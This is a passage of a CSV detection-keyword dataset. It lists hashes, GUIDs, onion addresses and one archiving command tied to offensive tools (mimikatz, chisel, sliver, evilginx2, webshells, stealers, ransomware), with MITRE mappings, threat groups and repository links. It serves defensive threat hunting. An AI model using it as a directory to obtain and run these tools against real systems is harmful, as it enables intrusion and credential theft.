- BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","28720" 
"*6feb42af348a1747fcefa53485fa6e6254ee5ad52b7d96d9027591efee282ee5*",".{0,1000}6feb42af348a1747fcefa53485fa6e6254ee5ad52b7d96d9027591efee282ee5.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","28723" "*6ff0ec2a775575ab2724c254aa386c44155453c1ae020446a6fb5b0535de65d3*",".{0,1000}6ff0ec2a775575ab2724c254aa386c44155453c1ae020446a6fb5b0535de65d3.{0,1000}","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","0","#filehash","N/A","9","5","480","96","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z","28725" "*6ff59387bfda905c88b75b8f345bca0fd9ea0ab327da28572a4e60c8bf4e1c4d*",".{0,1000}6ff59387bfda905c88b75b8f345bca0fd9ea0ab327da28572a4e60c8bf4e1c4d.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","#filehash","lolc2","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","28726" "*6FF9974C-B3C6-4EEA-8472-22BE6BD6F5CD*",".{0,1000}6FF9974C\-B3C6\-4EEA\-8472\-22BE6BD6F5CD.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - 
TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","#GUIDproject","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","28728" "*6FFCCF81-6C3C-4D3F-B15F-35A86D0B497F*",".{0,1000}6FFCCF81\-6C3C\-4D3F\-B15F\-35A86D0B497F.{0,1000}","offensive_tool_keyword","SharpMiniDump","Create a minidump of the LSASS process from memory","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/b4rtik/SharpMiniDump","1","0","#GUIDproject","N/A","10","3","260","49","2022-11-02T15:47:30Z","2019-09-15T13:45:42Z","28729" "*6ffd1850657b2dd46a03b1f2988a7c8d153943b6b7dc711c12a3c96fe77288b0*",".{0,1000}6ffd1850657b2dd46a03b1f2988a7c8d153943b6b7dc711c12a3c96fe77288b0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28730" "*6v4q5w7di74grj2vtmikzgx2tnq5eagyg2cubpcnqrvvee2ijpmprzqd.onion*",".{0,1000}6v4q5w7di74grj2vtmikzgx2tnq5eagyg2cubpcnqrvvee2ijpmprzqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","28731" 
"*6yofnrq7evqrtz3tzi3dkbrdovtywd35lx3iqbc5dyh367nrdh4jgfyd.onion*",".{0,1000}6yofnrq7evqrtz3tzi3dkbrdovtywd35lx3iqbc5dyh367nrdh4jgfyd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","28732" "*7.exe a -mx3 ad.7z ad_*.txt*",".{0,1000}7\.exe\sa\s\-mx3\sad\.7z\sad_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","7zip","7zip command to zip results from adfind scans. attackers perform Active Directory collection using AdFind in batch scripts from C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files","T1074.001 - T1083 - T1560.001 - T1105","TA0003 - TA0007 - TA0009","N/A","APT29 - Chamelgang - Karakurt - TA2101 - TRAVELING SPIDER","Exploitation tool","http://www.joeware.net/freetools/tools/adfind/index.htm","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","28733" "*7002cdf8ac44f3624ad432ec91b999012b0c3c8f91ffe230b9d0b8bb534e9723*",".{0,1000}7002cdf8ac44f3624ad432ec91b999012b0c3c8f91ffe230b9d0b8bb534e9723.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","28734" "*7010b962fefc8fb879e19b1f170345478875b81748b5a146218a7b0337627060*",".{0,1000}7010b962fefc8fb879e19b1f170345478875b81748b5a146218a7b0337627060.{0,1000}","offensive_tool_keyword","Burntcigar KillAV","Scans for process names linked to known antivirus or EDR products - then adds their process IDs to a stack for later termination - often used by attackers","T1089 - T1489 - 
T1562","TA0005","KillAV","Cuba","Malware","https://www.virustotal.com/gui/file/aeb044d310801d546d10b247164c78afde638a90b6ef2f04e1f40170e54dec03?nocache=1","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","28736" "*7015bb3d9a25c8809d80adc80aa0bd7e89c04502ca2b4836fcc62312d167a977*",".{0,1000}7015bb3d9a25c8809d80adc80aa0bd7e89c04502ca2b4836fcc62312d167a977.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","28737" "*7025b5a567c2599dc85b9dc1ad4f5591d46a186f8fca1a8773a6452e238eba03*",".{0,1000}7025b5a567c2599dc85b9dc1ad4f5591d46a186f8fca1a8773a6452e238eba03.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","28740" "*7026d773b575627e0e811e1027f8959ab9a596c9e9157359c9cd69be1328bac4*",".{0,1000}7026d773b575627e0e811e1027f8959ab9a596c9e9157359c9cd69be1328bac4.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","#filehash","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","28741" 
"*70376ae9437efcd92034825528cc12f1c0e03c1a4f965aabb3377d2a19e1d4f7*",".{0,1000}70376ae9437efcd92034825528cc12f1c0e03c1a4f965aabb3377d2a19e1d4f7.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","#filehash","N/A","10","","N/A","","","","28743" "*703eba011f882e07ae16555dbcb5c774ba822c83b2fba1918d4e807549111420*",".{0,1000}703eba011f882e07ae16555dbcb5c774ba822c83b2fba1918d4e807549111420.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28745" "*704a31cd89911a0f7d1741ee9ca32ca0f5496b06370bf398dfc5b7d3a31ef563*",".{0,1000}704a31cd89911a0f7d1741ee9ca32ca0f5496b06370bf398dfc5b7d3a31ef563.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","28746" "*704b2be6d3339668a2c4287473fe08261ef23808efcce1a09a0173e514655a18*",".{0,1000}704b2be6d3339668a2c4287473fe08261ef23808efcce1a09a0173e514655a18.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# 
offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28748" "*704d20f208c792e1eb4d56521304898839f3cd69d30ad830943c8e2dbe6c85cc*",".{0,1000}704d20f208c792e1eb4d56521304898839f3cd69d30ad830943c8e2dbe6c85cc.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","28751" "*704ebc20fe0c7678a2b73d97ba6ad2945ece3a7d35ba0e0a394b629570af00ca*",".{0,1000}704ebc20fe0c7678a2b73d97ba6ad2945ece3a7d35ba0e0a394b629570af00ca.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","28752" 
"*70511b1931a5d27f0f44bf8a3dbfd731b318b1914e743ff9aff00d8d86a8200b*",".{0,1000}70511b1931a5d27f0f44bf8a3dbfd731b318b1914e743ff9aff00d8d86a8200b.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","28753" "*70527328-DCEC-4BA7-9958-B5BC3E48CE99*",".{0,1000}70527328\-DCEC\-4BA7\-9958\-B5BC3E48CE99.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","#GUIDproject","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","28754" "*7054d78708ce7b1ac69aec272a9121fedf2ed2ae9d63813dee67a6f0838358f9*",".{0,1000}7054d78708ce7b1ac69aec272a9121fedf2ed2ae9d63813dee67a6f0838358f9.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28756" "*7055ed92ac04384f9e29339b6f64d5cf2f76dbdcc25feb0772020319675524f3*",".{0,1000}7055ed92ac04384f9e29339b6f64d5cf2f76dbdcc25feb0772020319675524f3.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28757" 
"*7056cfa64f838c96283c9df4f6318b952b0eca88de761fa37562c56b28f21220*",".{0,1000}7056cfa64f838c96283c9df4f6318b952b0eca88de761fa37562c56b28f21220.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","28758" "*705c75cc65b5a149efce2441e69749ad714da4a6d142a8b948b5ecb9e98ed69c*",".{0,1000}705c75cc65b5a149efce2441e69749ad714da4a6d142a8b948b5ecb9e98ed69c.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","28759" "*7067f8017505177909b1e7100dfe85349cef8c01858be393fa2c5cc8c718c0af*",".{0,1000}7067f8017505177909b1e7100dfe85349cef8c01858be393fa2c5cc8c718c0af.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","28760" "*706cab3e36eec233139d8b353970343383d32d87fa1eb722c5cef1ca3511256a*",".{0,1000}706cab3e36eec233139d8b353970343383d32d87fa1eb722c5cef1ca3511256a.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","0","#filehash","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","28761" 
"*706dbc3ea14dde772f2c6d4c85e20e4912dc2047c6dd2b00e2f995f9423518fb*",".{0,1000}706dbc3ea14dde772f2c6d4c85e20e4912dc2047c6dd2b00e2f995f9423518fb.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","28762" "*7076e114583006ebcf8f50ab7540ce8552af788431ef2a89227e74876dd13e17*",".{0,1000}7076e114583006ebcf8f50ab7540ce8552af788431ef2a89227e74876dd13e17.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","28763" "*70795D10-8ADF-4A4D-A584-9AB1BBF40D4B*",".{0,1000}70795D10\-8ADF\-4A4D\-A584\-9AB1BBF40D4B.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. 
Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","#GUIDproject","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","28764" "*709122fccdbf1d9d88fd3d6d52968feb83a696ff4504f1a26ce562707b0cc94a*",".{0,1000}709122fccdbf1d9d88fd3d6d52968feb83a696ff4504f1a26ce562707b0cc94a.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","28766" "*70920ad4b6ad5aa2ef24ec79e80de4f32f79b2cf4c1248c94d90456b8f269951*",".{0,1000}70920ad4b6ad5aa2ef24ec79e80de4f32f79b2cf4c1248c94d90456b8f269951.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28767" "*709b71707b611ad7d608eceaa3004435130cf7be89216cba2b4fdda77b3edcaa*",".{0,1000}709b71707b611ad7d608eceaa3004435130cf7be89216cba2b4fdda77b3edcaa.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. 
HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","28768" "*70a7532167ee90a2acf9daefea34f8aecc695f6c0cea9ed25871aa02494a1aa9*",".{0,1000}70a7532167ee90a2acf9daefea34f8aecc695f6c0cea9ed25871aa02494a1aa9.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28771" "*70aa63f7c9036825d5d1839815fb9d5528faee96f2450cfdfa074f827fe25edf*",".{0,1000}70aa63f7c9036825d5d1839815fb9d5528faee96f2450cfdfa074f827fe25edf.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28772" "*70aaf2b367b97fa35d599a6db4d08875206ef18c99d8c8c5b5f25e4f5509931a*",".{0,1000}70aaf2b367b97fa35d599a6db4d08875206ef18c99d8c8c5b5f25e4f5509931a.{0,1000}","offensive_tool_keyword","IEPassView","IE PassView scans all Internet Explorer passwords in your system and display them on the main window.","T1555 - T1212","TA0006","N/A","BlackSuit - Royal - GoGoogle - XDSpy","Credential Access","https://www.nirsoft.net/utils/internet_explorer_password.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","28773" 
"*70ad2f1fec1e1e6f270ea4fb6b83889c1b5d1fa1475eaeefce3cced3589962d9*",".{0,1000}70ad2f1fec1e1e6f270ea4fb6b83889c1b5d1fa1475eaeefce3cced3589962d9.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28774" "*70b5a24ffc45a0c4eadd31d0e202ec9059efc0f0881a50c28ca8ebc2504685e7*",".{0,1000}70b5a24ffc45a0c4eadd31d0e202ec9059efc0f0881a50c28ca8ebc2504685e7.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","28775" "*70b62b72b3206c93a43646a86ed17e93151626303dd3408583aceba93fc24c3e*",".{0,1000}70b62b72b3206c93a43646a86ed17e93151626303dd3408583aceba93fc24c3e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28776" "*70b9d9d9e9ae286c9bf21267d02108270e8c2bd924d7718a43875deb623b762a*",".{0,1000}70b9d9d9e9ae286c9bf21267d02108270e8c2bd924d7718a43875deb623b762a.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 
- T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28777" "*70BCFFDB-AE25-4BEA-BF0E-09DF06B7DBC4*",".{0,1000}70BCFFDB\-AE25\-4BEA\-BF0E\-09DF06B7DBC4.{0,1000}","offensive_tool_keyword","RemotePipeList","A small tool that can list the named pipes bound on a remote system.","T1047 - T1021.006","TA0008 - TA0002","N/A","N/A","Discovery","https://github.com/outflanknl/C2-Tool-Collection/tree/main/Other/RemotePipeList","1","0","#GUIDproject","N/A","10","10","1213","204","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z","28780" "*70c104eb31780222a3a882a3728cafeeb308d8ff718a5c9ce62778d579b3de86*",".{0,1000}70c104eb31780222a3a882a3728cafeeb308d8ff718a5c9ce62778d579b3de86.{0,1000}","offensive_tool_keyword","SchTask_0x727","create hidden scheduled tasks","T1053","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/0x727/SchTask_0x727","1","0","#filehash","N/A","10","6","532","112","2021-09-01T01:34:51Z","2021-08-30T03:29:34Z","28781" "*70c45d173ea7e04565166eca5d699763fc4d7c21eba93c6db67c727b0d1f23fa*",".{0,1000}70c45d173ea7e04565166eca5d699763fc4d7c21eba93c6db67c727b0d1f23fa.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","28782" "*70c62e0f2725a158d53c4fe2be205bb5ae07264a85af693741761e7fb7c8c521*",".{0,1000}70c62e0f2725a158d53c4fe2be205bb5ae07264a85af693741761e7fb7c8c521.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - 
T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","28783" "*70c62e0f2725a158d53c4fe2be205bb5ae07264a85af693741761e7fb7c8c521*",".{0,1000}70c62e0f2725a158d53c4fe2be205bb5ae07264a85af693741761e7fb7c8c521.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - 
